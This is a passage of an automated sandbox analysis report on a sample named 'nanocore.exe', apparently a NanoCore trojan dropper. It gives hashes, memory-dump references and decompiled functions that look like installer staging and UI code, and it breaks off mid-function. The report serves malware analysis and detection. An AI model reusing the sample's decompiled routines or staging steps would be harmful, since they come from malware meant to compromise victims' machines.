            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend
            • String ID: 4@
            • API String ID: 3850602802-2385517874
            • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
            • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
            • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
            • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E00403116(void* __eflags) {
            				void* _t2;
            				void* _t5;
            				CHAR* _t6;
            
            				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
            				E00405BFB(_t6);
            				_t2 = E00405538(_t6);
            				if(_t2 != 0) {
            					E004054CC(_t6);
            					CreateDirectoryA(_t6, 0); // executed
            					_t5 = E004056BF("\"C:\\Users\\jones\\Desktop\\nanocore.exe\" ", _t6); // executed
            					return _t5;
            				} else {
            					return _t2;
            				}
            			}

            APIs
              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Char$Next$CreateDirectoryPrev
            • String ID: "C:\Users\user\Desktop\nanocore.exe" $C:\Users\user\AppData\Local\Temp\
            • API String ID: 4115351271-92660408
            • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
            • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
            • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
            • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00405690(CHAR* _a4, long _a8, long _a12) {
            				signed int _t5;
            				void* _t6;
            
            				_t5 = GetFileAttributesA(_a4); // executed
            				asm("sbb ecx, ecx");
            				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
            				return _t6;
            			}

            APIs
            • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: File$AttributesCreate
            • String ID:
            • API String ID: 415043291-0
            • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
            • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
            • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
            • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004030CD(void* _a4, long _a8) {
            				int _t6;
            				long _t10;
            
            				_t10 = _a8;
            				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
            				if(_t6 == 0 || _a8 != _t10) {
            					return 0;
            				} else {
            					return 1;
            				}
            			}

            APIs
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
            • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
            • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
            • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004030FF(long _a4) {
            				long _t2;
            
            				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
            				return _t2;
            			}

            APIs
            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
            • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
            • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
            • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 89%
            			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
            				struct HWND__* _v8;
            				struct tagRECT _v24;
            				void* _v32;
            				signed int _v36;
            				int _v40;
            				CHAR* _v44;
            				signed int _v48;
            				int _v52;
            				void* _v56;
            				void* _v64;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				long _t86;
            				struct HMENU__* _t88;
            				unsigned int _t91;
            				int _t93;
            				int _t94;
            				void* _t100;
            				intOrPtr _t123;
            				struct HWND__* _t127;
            				int _t148;
            				int _t149;
            				struct HWND__* _t153;
            				struct HWND__* _t157;
            				struct HMENU__* _t159;
            				long _t161;
            				CHAR* _t162;
            				CHAR* _t163;
            
            				_t153 =  *0x7a2764;
            				_t148 = 0;
            				_v8 = _t153;
            				if(_a8 != 0x110) {
            					if(_a8 == 0x405) {
            						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
            					}
            					if(_a8 != 0x111) {
            						L16:
            						if(_a8 != 0x404) {
            							L24:
            							if(_a8 != 0x7b || _a12 != _t153) {
            								goto L19;
            							} else {
            								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
            								_a8 = _t86;
            								if(_t86 <= _t148) {
            									L36:
            									return 0;
            								}
            								_t88 = CreatePopupMenu();
            								_push(0xffffffe1);
            								_push(_t148);
            								_t159 = _t88;
            								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
            								_t91 = _a16;
            								if(_t91 != 0xffffffff) {
            									_t149 = _t91;
            									_t93 = _t91 >> 0x10;
            								} else {
            									GetWindowRect(_t153,  &_v24);
            									_t149 = _v24.left;
            									_t93 = _v24.top;
            								}
            								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
            								_t161 = 1;
            								if(_t94 == 1) {
            									_v56 = _t148;
            									_v44 = 0x79f580;
            									_v40 = 0xfff;
            									_a4 = _a8;
            									do {
            										_a4 = _a4 - 1;
            										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
            									} while (_a4 != _t148);
            									OpenClipboard(_t148);
            									EmptyClipboard();
            									_t100 = GlobalAlloc(0x42, _t161);
            									_a4 = _t100;
            									_t162 = GlobalLock(_t100);
            									do {
            										_v44 = _t162;
            										SendMessageA(_v8, 0x102d, _t148,  &_v64);
            										_t163 =  &(_t162[lstrlenA(_t162)]);
            										 *_t163 = 0xa0d;
            										_t162 =  &(_t163[2]);
            										_t148 = _t148 + 1;
            									} while (_t148 < _a8);
            									GlobalUnlock(_a4);
            									SetClipboardData(1, _a4);
            									CloseClipboard();
            								}
            								goto L36;
            							}
            						}
            						if( *0x7a274c == _t148) {
            							ShowWindow( *0x7a2f84, 8);
            							if( *0x7a300c == _t148) {
            								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
            							}
            							E00403D80(1);
            							goto L24;
            						}
            						 *0x79e950 = 2;
            						E00403D80(0x78);
            						goto L19;
            					} else {
            						if(_a12 != 0x403) {
            							L19:
            							return E00403E0E(_a8, _a12, _a16);
            						}
            						ShowWindow( *0x7a2750, _t148);
            						ShowWindow(_t153, 8);
            						E0040417A();
            						goto L16;
            					}
            				}
            				_v48 = _v48 | 0xffffffff;
            				_v36 = _v36 | 0xffffffff;
            				_v56 = 2;
            				_v52 = 0;
            				_v44 = 0;
            				_v40 = 0;
            				asm("stosd");
            				asm("stosd");
            				_t123 =  *0x7a2f88;
            				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
            				_a12 =  *((intOrPtr*)(_t123 + 0x60));
            				 *0x7a2750 = GetDlgItem(_a4, 0x403);
            				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
            				_t127 = GetDlgItem(_a4, 0x3f8);
            				 *0x7a2764 = _t127;
            				_v8 = _t127;
            				E00403DDC( *0x7a2750);
            				 *0x7a2754 = E004045FA(4);
            				 *0x7a276c = 0;
            				GetClientRect(_v8,  &_v24);
            				_v48 = _v24.right - GetSystemMetrics(0x15);
            				SendMessageA(_v8, 0x101b, 0,  &_v56);
            				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
            				if(_a8 >= 0) {
            					SendMessageA(_v8, 0x1001, 0, _a8);
            					SendMessageA(_v8, 0x1026, 0, _a8);
            				}
            				if(_a12 >= _t148) {
            					SendMessageA(_v8, 0x1024, _t148, _a12);
            				}
            				_push( *((intOrPtr*)(_a16 + 0x30)));
            				_push(0x1b);
            				E00403DA7(_a4);
            				if(( *0x7a2f90 & 0x00000003) != 0) {
            					ShowWindow( *0x7a2750, _t148);
            					if(( *0x7a2f90 & 0x00000002) != 0) {
            						 *0x7a2750 = _t148;
            					} else {
            						ShowWindow(_v8, 8);
            					}
            				}
            				_t157 = GetDlgItem(_a4, 0x3ec);
            				SendMessageA(_t157, 0x401, _t148, 0x75300000);
            				if(( *0x7a2f90 & 0x00000004) != 0) {
            					SendMessageA(_t157, 0x409, _t148, _a12);
            					SendMessageA(_t157, 0x2001, _t148, _a8);
            				}
            				goto L36;
            			}

            APIs
            • GetDlgItem.USER32 ref: 00404EFF
            • GetDlgItem.USER32 ref: 00404F0E
            • GetDlgItem.USER32 ref: 00404F1D
              • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
            • GetClientRect.USER32 ref: 00404F4B
            • GetSystemMetrics.USER32 ref: 00404F53
            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
            • ShowWindow.USER32(?,00000008), ref: 00404FEF
            • GetDlgItem.USER32 ref: 00405005
            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
            • GetDlgItem.USER32 ref: 00405057
            • CreateThread.KERNEL32(00000000,00000000,Function_00004E34,00000000), ref: 00405065
            • CloseHandle.KERNEL32(00000000), ref: 0040506C
            • ShowWindow.USER32(00000000), ref: 00405090
            • ShowWindow.USER32(?,00000008), ref: 00405095
            • ShowWindow.USER32(00000008), ref: 004050DB
            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
            • CreatePopupMenu.USER32 ref: 0040511E
            • AppendMenuA.USER32 ref: 00405133
            • GetWindowRect.USER32 ref: 00405146
            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
            • OpenClipboard.USER32(00000000), ref: 004051B3
            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
            • GlobalLock.KERNEL32 ref: 004051CC
            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
            • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
            • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
            • SetClipboardData.USER32 ref: 00405209
            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
            • String ID: {
            • API String ID: 1050754034-366298937
            • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
            • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
            • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
            • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
            				struct HWND__* _v8;
            				struct HWND__* _v12;
            				signed int _v16;
            				intOrPtr _v20;
            				struct HBITMAP__* _v24;
            				long _v28;
            				int _v32;
            				signed int _v40;
            				int _v44;
            				signed int* _v56;
            				intOrPtr _v60;
            				signed int _v64;
            				long _v68;
            				void* _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				void* _v84;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				struct HWND__* _t182;
            				int _t196;
            				long _t202;
            				signed int _t206;
            				signed int _t217;
            				void* _t220;
            				void* _t221;
            				int _t227;
            				signed int _t232;
            				signed int _t233;
            				signed int _t240;
            				void* _t252;
            				intOrPtr _t258;
            				char* _t268;
            				signed char _t269;
            				long _t274;
            				int _t280;
            				signed int* _t281;
            				int _t282;
            				long _t283;
            				int _t285;
            				long _t286;
            				signed int _t287;
            				long _t288;
            				signed int _t291;
            				signed int _t298;
            				signed int _t300;
            				signed int _t302;
            				int* _t310;
            				void* _t311;
            				int _t315;
            				int _t316;
            				int _t317;
            				signed int _t318;
            				void* _t320;
            
            				_v12 = GetDlgItem(_a4, 0x3f9);
            				_t182 = GetDlgItem(_a4, 0x408);
            				_t280 =  *0x7a2fa8;
            				_t320 = SendMessageA;
            				_v8 = _t182;
            				_t315 = 0;
            				_v32 = _t280;
            				_v20 =  *0x7a2f88 + 0x94;
            				if(_a8 != 0x110) {
            					L23:
            					if(_a8 != 0x405) {
            						_t289 = _a16;
            					} else {
            						_a12 = _t315;
            						_t289 = 1;
            						_a8 = 0x40f;
            						_a16 = 1;
            					}
            					if(_a8 == 0x4e || _a8 == 0x413) {
            						_v16 = _t289;
            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
            							if(( *0x7a2f91 & 0x00000002) != 0) {
            								L41:
            								if(_v16 != _t315) {
            									_t232 = _v16;
            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
            										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
            									}
            									_t233 = _v16;
            									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
            										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
            											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
            										} else {
            											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
            										}
            									}
            								}
            								goto L48;
            							}
            							if(_a8 == 0x413) {
            								L33:
            								_t289 = 0 | _a8 != 0x00000413;
            								_t240 = E00404627(_v8, _a8 != 0x413);
            								if(_t240 >= _t315) {
            									_t93 = _t280 + 8; // 0x8
            									_t310 = _t240 * 0x418 + _t93;
            									_t289 =  *_t310;
            									if((_t289 & 0x00000010) == 0) {
            										if((_t289 & 0x00000040) == 0) {
            											_t298 = _t289 ^ 0x00000001;
            										} else {
            											_t300 = _t289 ^ 0x00000080;
            											if(_t300 >= 0) {
            												_t298 = _t300 & 0xfffffffe;
            											} else {
            												_t298 = _t300 | 0x00000001;
            											}
            										}
            										 *_t310 = _t298;
            										E0040117D(_t240);
            										_t289 = 1;
            										_a8 = 0x40f;
            										_a12 = 1;
            										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
            									}
            								}
            								goto L41;
            							}
            							_t289 = _a16;
            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
            								goto L41;
            							}
            							goto L33;
            						} else {
            							goto L48;
            						}
            					} else {
            						L48:
            						if(_a8 != 0x111) {
            							L56:
            							if(_a8 == 0x200) {
            								SendMessageA(_v8, 0x200, _t315, _t315);
            							}
            							if(_a8 == 0x40b) {
            								_t220 =  *0x79f564;
            								if(_t220 != _t315) {
            									ImageList_Destroy(_t220);
            								}
            								_t221 =  *0x79f578;
            								if(_t221 != _t315) {
            									GlobalFree(_t221);
            								}
            								 *0x79f564 = _t315;
            								 *0x79f578 = _t315;
            								 *0x7a2fe0 = _t315;
            							}
            							if(_a8 != 0x40f) {
            								L86:
            								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
            									_t316 = (0 | _a16 == 0x00000020) << 3;
            									ShowWindow(_v8, _t316);
            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
            								}
            								goto L89;
            							} else {
            								E004011EF(_t289, _t315, _t315);
            								if(_a12 != _t315) {
            									E00401410(8);
            								}
            								if(_a16 == _t315) {
            									L73:
            									E004011EF(_t289, _t315, _t315);
            									_v32 =  *0x79f578;
            									_t196 =  *0x7a2fa8;
            									_v60 = 0xf030;
            									_v16 = _t315;
            									if( *0x7a2fac <= _t315) {
            										L84:
            										InvalidateRect(_v8, _t315, 1);
            										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
            											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
            										}
            										goto L86;
            									}
            									_t281 = _t196 + 8;
            									do {
            										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
            										if(_t202 != _t315) {
            											_t291 =  *_t281;
            											_v68 = _t202;
            											_v72 = 8;
            											if((_t291 & 0x00000001) != 0) {
            												_v72 = 9;
            												_v56 =  &(_t281[4]);
            												_t281[0] = _t281[0] & 0x000000fe;
            											}
            											if((_t291 & 0x00000040) == 0) {
            												_t206 = (_t291 & 0x00000001) + 1;
            												if((_t291 & 0x00000010) != 0) {
            													_t206 = _t206 + 3;
            												}
            											} else {
            												_t206 = 3;
            											}
            											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
            											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
            											SendMessageA(_v8, 0x110d, _t315,  &_v72);
            										}
            										_v16 = _v16 + 1;
            										_t281 =  &(_t281[0x106]);
            									} while (_v16 <  *0x7a2fac);
            									goto L84;
            								} else {
            									_t282 = E004012E2( *0x79f578);
            									E00401299(_t282);
            									_t217 = 0;
            									_t289 = 0;
            									if(_t282 <= _t315) {
            										L72:
            										SendMessageA(_v12, 0x14e, _t289, _t315);
            										_a16 = _t282;
            										_a8 = 0x420;
            										goto L73;
            									} else {
            										goto L69;
            									}
            									do {
            										L69:
            										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
            											_t289 = _t289 + 1;
            										}
            										_t217 = _t217 + 1;
            									} while (_t217 < _t282);
            									goto L72;
            								}
            							}
            						}
            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
            							goto L89;
            						} else {
            							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
            							if(_t227 == 0xffffffff) {
            								goto L89;
            							}
            							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
            							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
            								_t283 = 0x20;
            							}
            							E00401299(_t283);
            							SendMessageA(_a4, 0x420, _t315, _t283);
            							_a12 = 1;
            							_a16 = _t315;
            							_a8 = 0x40f;
            							goto L56;
            						}
            					}
            				} else {
            					 *0x7a2fe0 = _a4;
            					_t285 = 2;
            					_v28 = 0;
            					_v16 = _t285;
            					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
            					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
            					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
            					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
            					 *0x79f564 = _t252;
            					ImageList_AddMasked(_t252, _v24, 0xff00ff);
            					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
            					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
            						SendMessageA(_v8, 0x111b, 0x10, 0);
            					}
            					DeleteObject(_v24);
            					_t286 = 0;
            					do {
            						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
            						if(_t258 != _t315) {
            							if(_t286 != 0x20) {
            								_v16 = _t315;
            							}
            							_push(_t258);
            							_push(_t315);
            							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
            						}
            						_t286 = _t286 + 1;
            					} while (_t286 < 0x21);
            					_t317 = _a16;
            					_t287 = _v16;
            					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
            					_push(0x15);
            					E00403DA7(_a4);
            					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
            					_push(0x16);
            					E00403DA7(_a4);
            					_t318 = 0;
            					_t288 = 0;
            					if( *0x7a2fac <= 0) {
            						L19:
            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
            						goto L20;
            					} else {
            						_t311 = _v32 + 8;
            						_v24 = _t311;
            						do {
            							_t268 = _t311 + 0x10;
            							if( *_t268 != 0) {
            								_v60 = _t268;
            								_t269 =  *_t311;
            								_t302 = 0x20;
            								_v84 = _t288;
            								_v80 = 0xffff0002;
            								_v76 = 0xd;
            								_v64 = _t302;
            								_v40 = _t318;
            								_v68 = _t269 & _t302;
            								if((_t269 & 0x00000002) == 0) {
            									if((_t269 & 0x00000004) == 0) {
            										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
            									} else {
            										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
            									}
            								} else {
            									_v76 = 0x4d;
            									_v44 = 1;
            									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
            									_v28 = 1;
            									 *( *0x79f578 + _t318 * 4) = _t274;
            									_t288 =  *( *0x79f578 + _t318 * 4);
            								}
            							}
            							_t318 = _t318 + 1;
            							_t311 = _v24 + 0x418;
            							_v24 = _t311;
            						} while (_t318 <  *0x7a2fac);
            						if(_v28 != 0) {
            							L20:
            							if(_v16 != 0) {
            								E00403DDC(_v8);
            								_t280 = _v32;
            								_t315 = 0;
            								goto L23;
            							} else {
